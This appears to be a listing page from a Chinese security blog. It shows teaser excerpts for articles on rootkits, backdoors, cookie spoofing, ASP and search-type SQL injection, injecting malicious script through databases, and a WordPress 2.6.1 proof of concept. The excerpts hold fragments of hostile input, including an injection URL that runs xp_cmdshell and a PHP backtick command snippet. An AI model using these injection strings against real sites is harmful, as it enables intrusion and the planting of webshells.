知识科普 Rootkit技术之内核钩子原理 我们知道,应用程序总是离不开系统内核所提供的服务,比如它要使用内存的时候,只要跟操作系统申请就行了,而不用自己操心哪里有空闲的内存空间等问题,实际上,这些问题是由操作系统的内核来代劳的。站在黑客的角度... 08月02日 1,120 次浏览 发表评论 阅读全文
菜鸟要了解的三种后门技术安全知识 曾经饱受木马、后门(以下统称后门)侵害的人们都不会忘记机器被破坏后的惨象,于是人们展开了积极的防御工作,从补丁到防火墙,恨不得连网线都加个验证器,在多种多样的防御手法夹攻下,一大批后门倒下了,菜鸟们也... 08月02日 网络安全 912 次浏览 发表评论 阅读全文
实例讲解Cookies欺骗与session欺骗入侵 我们先来说下基础知识,免的一些菜鸟看不懂,有借鉴. cookies欺骗,就是在只对用户做cookies验证的系统中,通过修改cookies的内容来得到相应的用户权限登录。 那么什么是cookies... 08月02日 网络安全 884 次浏览 发表评论 阅读全文
ASP注入详细命令40条 1、 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell ... 08月02日 网络安全 914 次浏览 发表评论 阅读全文
PHP漏洞挖掘的一点思路 <?php $now1 = `date`; echo "Now date is: $now1"; ?> /* 利用PHP的反引号` (不明白的自己查资料反引号"... 08月02日 网络安全 897 次浏览 发表评论 阅读全文
教你数据库挂马 以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。 SQL语句如下: 用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字... 08月02日 网络安全 979 次浏览 发表评论 阅读全文
基于Windows入门级IDS构建过程详述 从现实来看,市场上所大行其道的IDS产品价格从数十万到数百万不等,这种相对昂贵的奶酪被广为诟病,所导致的结果就是:一般中小企业并不具备实施IDS产品的能力,它们的精力会放在路由器、防火墙以及3层以上交... 08月02日 网络安全 986 次浏览 发表评论 阅读全文
ASP搜索型注入 简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。 然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息... 08月02日 网络安全 885 次浏览 发表评论 阅读全文
网络安全 看黑客是如何黑了落伍者的(图) 前天,听说落伍分类信息程序发布了,就想前去看看,什么样子的.一看,真不愧是落伍的产品,风格依然落伍,功能还行,大体一看没什么漏洞. 看看服务器吧.ping demo.im286.com返回IP 58.... 08月02日 1,147 次浏览 发表评论 阅读全文
WordPress 2.6.1 SQL Column Truncation Vulnerability 用wordpress的要注意了 # WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC) # # found by irk4zyahoo.... 08月02日 网络安全 846 次浏览 发表评论 阅读全文